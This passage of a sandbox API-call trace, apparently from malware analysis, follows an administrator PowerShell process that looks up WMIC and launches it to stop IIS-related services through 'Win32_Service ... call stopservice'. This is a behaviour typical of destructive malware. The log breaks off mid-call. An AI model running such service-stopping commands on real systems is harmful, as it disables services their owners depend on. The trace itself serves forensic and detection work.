CloseHandle (hObject=0x750) returned 1 [0297.248] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x88, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.253] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x88, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.253] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.253] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.253] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.254] SetEvent (hEvent=0x7f8) returned 1 [0297.254] SetEvent (hEvent=0x410) returned 1 [0297.254] SetEvent (hEvent=0x804) returned 1 [0297.254] SetEvent (hEvent=0x7fc) returned 1 [0297.255] SetEvent (hEvent=0x808) returned 1 [0297.255] SetEvent (hEvent=0x7f4) returned 1 [0297.255] SetEvent (hEvent=0x7f0) returned 1 [0297.255] SetEvent (hEvent=0x7ec) returned 1 [0297.255] SetEvent (hEvent=0x87c) returned 1 [0297.255] SetEvent (hEvent=0x80c) returned 1 [0297.256] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0297.261] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0297.264] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x521ad025, Data2=0xd25e, Data3=0x430d, Data4=([0]=0xa5, [1]=0x2a, [2]=0x84, [3]=0x40, [4]=0x9e, [5]=0xe1, [6]=0xc0, [7]=0x33))) returned 0x0 [0297.264] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=39229899486) returned 1 [0297.264] AmsiOpenSession () returned 0x0 [0297.264] AmsiScanString () returned 0x80070015 [0297.276] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=39231067216) returned 1 [0297.276] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.277] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.278] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ") returned 0x0 [0297.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0297.279] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0297.280] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0297.280] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0297.280] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0297.280] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0297.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0297.282] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0297.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0297.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0297.282] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0297.282] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0297.282] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0297.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0297.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0297.283] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0297.283] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0297.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0297.283] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0297.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0297.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0297.284] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0297.284] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0297.284] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0297.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0297.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0297.284] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0297.285] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0297.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0297.285] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0297.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0297.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0297.285] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0297.285] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0297.285] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0297.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0297.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0297.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0297.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0297.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0297.286] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0297.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0297.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0297.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0297.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0297.286] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0297.287] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0297.287] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0297.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0297.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0297.287] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0297.287] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x90, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.288] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.288] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x90, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x90, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0297.288] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0297.289] GetConsoleWindow () returned 0x302b8 [0297.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0297.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0297.294] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0297.294] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0297.295] CoTaskMemFree (pv=0x7e29450) [0297.296] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c71474 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice", lpProcessInformation=0x4c71474*(hProcess=0x9d4, hThread=0x970, dwProcessId=0x11c4, dwThreadId=0x115c)) returned 1 [0297.311] CloseHandle (hObject=0x970) returned 1 [0297.311] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0297.311] GetCurrentProcess () returned 0xffffffff [0297.311] GetCurrentProcess () returned 0xffffffff [0297.312] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x9d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x970) returned 1 [0297.312] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x970, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0299.371] CloseHandle (hObject=0x970) returned 1 [0299.371] GetExitCodeProcess (in: hProcess=0x9d4, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0299.372] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0299.382] CloseHandle (hObject=0x9d4) returned 1 [0299.383] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x90, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.384] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x90, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.384] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.384] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.384] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.384] SetEvent (hEvent=0x89c) returned 1 [0299.384] SetEvent (hEvent=0x890) returned 1 [0299.384] SetEvent (hEvent=0x894) returned 1 [0299.384] SetEvent (hEvent=0x898) returned 1 [0299.384] SetEvent (hEvent=0x8ac) returned 1 [0299.384] SetEvent (hEvent=0x8a0) returned 1 [0299.385] SetEvent (hEvent=0x8a4) returned 1 [0299.385] SetEvent (hEvent=0x8a8) returned 1 [0299.385] SetEvent (hEvent=0x968) returned 1 [0299.385] SetEvent (hEvent=0x8b0) returned 1 [0299.385] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0299.389] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0299.390] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xf0597210, Data2=0xaec0, Data3=0x4469, Data4=([0]=0xa0, [1]=0x20, [2]=0x59, [3]=0xb2, [4]=0x9b, [5]=0x70, [6]=0x8e, [7]=0x1f))) returned 0x0 [0299.390] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: 